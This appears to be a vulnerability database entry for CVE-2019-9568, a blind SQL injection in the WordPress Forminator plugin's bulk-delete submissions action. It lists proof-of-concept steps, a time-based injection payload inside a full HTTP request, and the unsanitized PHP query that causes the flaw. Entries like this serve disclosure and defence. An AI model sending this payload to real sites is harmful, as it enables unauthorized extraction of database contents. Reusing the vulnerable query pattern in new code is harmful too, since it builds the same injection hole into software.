Lucene search
CVE 0dayCVE0DAY:D7CBE927705AD2466F6779C330D5C5D7HistoryMar 05, 2019 - 1:50 p.m.
WordPress Forminator Plugin CVE-2019-9568
2019-03-0513:50:29
CVE 0day
www.cve0day.com
43
EPSS
0.003
Percentile
65.9%
Description
The action of deleting submissions is vulnerable to blind SQL injection. An attacker can exploit this to extract data from the database.
An account with the permission to delete submissions is required.
Proof of Concept
- View submissions, eg at http://192.168.0.103/wordpress/wp-admin/admin.php?page=forminator-entries&form_type=forminator_forms&form_id=133
- check the checkbox of one submission, use bulk action -> delete entries
- apply the action and intercept or replay the request
- change the
entry[]value to contain an SQL payload, eg: 1) or sleep(5)–x-
Request
GET /wordpress/wp-admin/admin.php?page=forminator-entries&form_type=forminator_forms&form_id=133&forminatorEntryNonce=1c8732f95e&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dforminator-entries%26form_type%3Dforminator_forms%26form_id%3D133&entries-action=&date_range=&min_id=&max_id=&search=&order_by=entries.date_created&order=DESC&entry%5B%5D=1)+or+sleep(5)--+-&entry%5B%5D=1&entries-action-bottom=delete-all HTTP/1.1
Host: 192.168.0.103
A valid nonce is required.
Code
forminator/library/model/class-form-entry-model.php
$sql = "DELETE FROM {$table_meta_name} WHERE `entry_id` IN ($entries)";
$db->query( $sql );
$sql = "DELETE FROM {$table_name} WHERE `entry_id` IN ($entries)";
Related
prion
prion
Sql injection
2019-03-04 18:29:00
nvd
nvd
CVE-2019-9568
2019-03-04 18:29:00
cve
cve
CVE-2019-9568
2019-03-04 18:29:00
cvelist
cvelist
CVE-2019-9568
2019-03-04 18:00:00
wpvulndb
wpvulndb
Forminator <= 1.5.4 - Authenticated Multiple Vulnerabilities
2019-02-06 00:00:00
openvas
openvas
WordPress Forminator Plugin < 1.6 Multiple Vulnerabilities
2019-03-05 00:00:00